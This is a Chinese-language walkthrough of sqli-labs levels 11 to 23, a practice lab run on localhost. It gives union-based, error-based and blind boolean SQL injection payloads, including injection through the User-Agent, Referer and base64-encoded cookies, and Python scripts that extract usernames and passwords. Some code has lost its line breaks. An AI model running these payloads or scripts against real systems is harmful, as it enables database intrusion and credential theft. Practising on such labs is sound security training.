网络安全之sql靶场（11-23）

sql靶场（11-23）

目录

第十一关（post注入）

第十二关

第十三关

第十四关

第十五关

第十六关

第十七关

第十八关

第十九关

第二十关

第二十一关

第二十二关

第二十三关

---

第十一关（post注入）

查看页面

我们发现是有注入点的，所以我们可以尝试使用联合查询注入

我们发现联合查询注入是可行的，接下来就是该爆数据库、表、字段和用户账号密码

aaa' union select 1,database()#
aaa' union select 1,group_concat(table_name) from information_schema.tables where table_schema ='security'#
aaa' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
aaa' union select 1,group_concat(username ,0x3a , password) from users#

结果

第十二关

查看页面

尝试之后发现这一关和十一关只是闭合方式不同

aaa") union select 1,database()#
aaa") union select 1,group_concat(table_name) from information_schema.tables where table_schema ='security'#
aaa") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
aaa") union select 1,group_concat(username ,0x3a , password) from users#

结果

第十三关

查看页面，经过测试发现，只有报错注入可以回显，同时闭合方式也和之前有所不同。

aaa') and updatexml(1,user(),1)#
aaa') and updatexml(1,concat('~',(select database()),'~'),1)#
aaa') and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)#
aaa') and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1)#
aaa') and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)#

由于只能显示一个字段，所以我们使用limit进行逐个输出（我这里只输出第一组用户名和密码，其余自己进行）

第十四关

查看页面，经过测试发现这一关和第十三关只是闭合方式不同，所以我们依旧需要使用报错注入进行注入

aaa" and updatexml(1,user(),1)#
aaa" and updatexml(1,concat('~',(select database()),'~'),1)#
aaa" and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)#
aaa" and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1)#
aaa" and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)#

结果

第十五关

查看页面，经过不断测试，发现页面只有成功与失败两个界面，所以我的第一想法就是布尔盲注

所以我们使用脚本直接爆出来这关

import requests#爆破数据库名
# def inject_database(url):
#     name = ''
#     for i in range(1, 20):
#         min_value = 32
#         max_value = 128
#         mid = (min_value + max_value) // 2
#         while min_value < max_value:
#             data = {
#                 "uname": "aaaa' or ascii(substr(database(),%d,1))> %d#" % (i,mid),
#                 "passwd": "aaa"
#                     }
#             r = requests.post(url=url, data=data)
#             if "flag.jpg" in r.text:
#                 min_value = mid + 1
#             else:
#                 max_value = mid
#             mid = (min_value + max_value) // 2
#         if mid == 32:
#             break
#         name += chr(mid)
#         print(name)
#     return name#爆破表名
# def inject_database(url):
#     name = ''
#     for i in range(1, 20):
#         min_value = 32
#         max_value = 128
#         mid = (min_value + max_value) // 2
#         while min_value < max_value:
#             data = {
#                 "uname": "aaa' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'), %d, 1)) > %d#" % (i, mid),
#                 "passwd": "aaa"
#                     }
#             r = requests.post(url=url, data=data)
#             if "flag.jpg" in r.text:
#                 min_value = mid + 1
#             else:
#                 max_value = mid
#             mid = (min_value + max_value) // 2
#         if mid == 32:
#             break
#         name += chr(mid)
#         print(name)
#     return name#爆破列名
# def inject_database(url):
#     name = ''
#     for i in range(1, 20):
#         min_value = 32
#         max_value = 128
#         mid = (min_value + max_value) // 2
#         while min_value < max_value:
#             data = {
#                 "uname": "aaa' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), %d, 1)) > %d#" % (i, mid),
#                 "passwd": "aaa"
#                     }
#             r = requests.post(url=url, data=data)
#             if "flag.jpg" in r.text:
#                 min_value = mid + 1
#             else:
#                 max_value = mid
#             mid = (min_value + max_value) // 2
#         if mid == 32:
#             break
#         name += chr(mid)
#         print(name)
#     return name#爆破用户和密码
def inject_database(url):name = ''for i in range(1, 20):min_value = 32max_value = 128mid = (min_value + max_value) // 2while min_value < max_value:data = {"uname": "aaa' or ascii(substr((select group_concat(username, 0x3a, password) from users), %d, 1)) > %d#" % (i, mid),"passwd": "aaa"}r = requests.post(url=url, data=data)if "flag.jpg" in r.text:min_value = mid + 1else:max_value = midmid = (min_value + max_value) // 2if mid == 32:breakname += chr(mid)print(name)return nameif __name__ == "__main__":url = 'http://127.0.0.1/sqllabs/Less-15/'inject_database(url)

结果

第十六关

查看页面发现这一关和第十五关只有闭合方式不一样

import requests#爆破数据库名
# def inject_database(url):
#     name = ''
#     for i in range(1, 20):
#         min_value = 32
#         max_value = 128
#         mid = (min_value + max_value) // 2
#         while min_value < max_value:
#             data = {
#                 "uname": 'aaaa") or ascii(substr(database(),%d,1))> %d#' % (i,mid),
#                 "passwd": "aaa"
#                     }
#             r = requests.post(url=url, data=data)
#             if "flag.jpg" in r.text:
#                 min_value = mid + 1
#             else:
#                 max_value = mid
#             mid = (min_value + max_value) // 2
#         if mid == 32:
#             break
#         name += chr(mid)
#         print(name)
#     return name#爆破表名
# def inject_database(url):
#     name = ''
#     for i in range(1, 20):
#         min_value = 32
#         max_value = 128
#         mid = (min_value + max_value) // 2
#         while min_value < max_value:
#             data = {
#                 "uname": 'aaa") or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="security"), %d, 1)) > %d#' % (i, mid),
#                 "passwd": "aaa"
#                     }
#             r = requests.post(url=url, data=data)
#             if "flag.jpg" in r.text:
#                 min_value = mid + 1
#             else:
#                 max_value = mid
#             mid = (min_value + max_value) // 2
#         if mid == 32:
#             break
#         name += chr(mid)
#         print(name)
#     return name#爆破列名
# def inject_database(url):
#     name = ''
#     for i in range(1, 20):
#         min_value = 32
#         max_value = 128
#         mid = (min_value + max_value) // 2
#         while min_value < max_value:
#             data = {
#                 "uname": 'aaa") or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema = "security" and table_name = "users"), %d, 1)) > %d#' % (i, mid),
#                 "passwd": "aaa"
#                     }
#             r = requests.post(url=url, data=data)
#             if "flag.jpg" in r.text:
#                 min_value = mid + 1
#             else:
#                 max_value = mid
#             mid = (min_value + max_value) // 2
#         if mid == 32:
#             break
#         name += chr(mid)
#         print(name)
#     return name#爆破用户和密码
def inject_database(url):name = ''for i in range(1, 20):min_value = 32max_value = 128mid = (min_value + max_value) // 2while min_value < max_value:data = {"uname": 'aaa") or ascii(substr((select group_concat(username, 0x3a, password) from users), %d, 1)) > %d#' % (i, mid),"passwd": 'aaa'}r = requests.post(url=url, data=data)if "flag.jpg" in r.text:min_value = mid + 1else:max_value = midmid = (min_value + max_value) // 2if mid == 32:breakname += chr(mid)print(name)return nameif __name__ == "__main__":url = 'http://127.0.0.1/sqllabs/Less-16/'inject_database(url)

结果

第十七关

这一关查看源码后发现，username不能进行注入了，但是password依然可以进行注入，但是这就有一个前提条件就是username必须输入正确。可以这一关的页面后发现这一关其实就是改密码，既然是改密码那么你就必须知道用户名了

证明我的想法是正确的，就是在密码这里进行注入

aaa' and updatexml(1,user(),1)#
aaa' and updatexml(1,concat('~',(select database()),'~'),1)#
1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)#
1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1)#
1' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)#

结果

很明显，成功爆出来用户名和密码啦，想要继续爆就修改limit后面的参数就可以啦。

第十八关

查看页面

这一关经过测试感觉和之前的有些区别啦，这时候我分析源码后发现注入点在user-agent上，所以我们可以试着抓包进行注入（使用抓包工具burpsuite进行抓包）

首先使用proxy模块进行抓包，抓取后发送到repeater模块进行分析修改

很明显可以看出来有注入点啦

aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1aaa' and updatexml(1,concat('~',(select database()),'~'),1) and '1'='11' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) and '1'='11' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1) and '1'='11' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

很明显成功爆出来了他的用户名和密码。

第十九关

查看页面，感觉这一关和十八关有些类似

我直接进行了抓包，通过不断测试，发现注入点在referer上面

那么我就可以直接注入了

aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1aaa' and updatexml(1,concat('~',(select database()),'~'),1) and '1'='11' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) and '1'='11' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1) and '1'='11' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

结果

第二十关

查看页面并登录成功后发现cookie在页面中有点突出

所以直接抓包修改cookie看是不是注入点，结果显而易见是注入点

aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1aaa' and updatexml(1,concat('~',(select database()),'~'),1) and '1'='11' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) and '1'='11' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1) and '1'='1admin' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

结果

第二十一关

查看页面并成功登录后发现页面cookie进行了编码

那么我有理由猜测吧payload进行编码再注入，会不会爆出东西呢，试一试，

看来我猜测是没错，那么接下来就是把payload语句进行base64编码后在进行注入，这里不得不说burpsuite的优势了，自带编码模块（感觉挺爽得啦），payload放下面啦，自己进行编码吧

aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1aaa' and updatexml(1,concat('~',(select database()),'~'),1) and '1'='11' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) and '1'='11' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1) and '1'='1admin' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

结果

第二十二关

查看页面并成功登录后发现页面的cookie依然进行了编码，那我有理由怀疑是不是闭合方式变了呢，直接试一试

因为这个也是需要进行base64编码，自己进行编码

aaa" and updatexml(1,concat(0x7e,(select user()),0x7e),1) and "1"="1aaa" and updatexml(1,concat('~',(select database()),'~'),1) and '1'="11" and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) and '1'="11" and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1) and '1'="1admin" and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'="1

结果

第二十三关

查看页面后发现这一关又回到了我们的老朋友GET传参啦

试过好多后无从下手，解读源代码后发现这一关进行了过滤，

想了一下，既然过滤了注释符，娜美我们直接进行闭合试一试

经过测试发现我的想法是可行的，

那么进行全过程是爆破吧

爆表
http://127.0.0.1/sqllabs/less-23/?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%27security%27%20and%20%271%27=%271爆字段
http://127.0.0.1/sqllabs/less-23/?id=-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27%20and%20%271%27=%271爆用户和密码
http://127.0.0.1/sqllabs/less-23/?id=-1%27%20union%20select%201,2,group_concat(username%20,0x3a%20,%20password)%20from%20users%20where%20%271%27=%271

结果

接下来的24关我会放在单独的一片文档中，因为24关事二次注入，所以我还会引入两个ctf的二次注入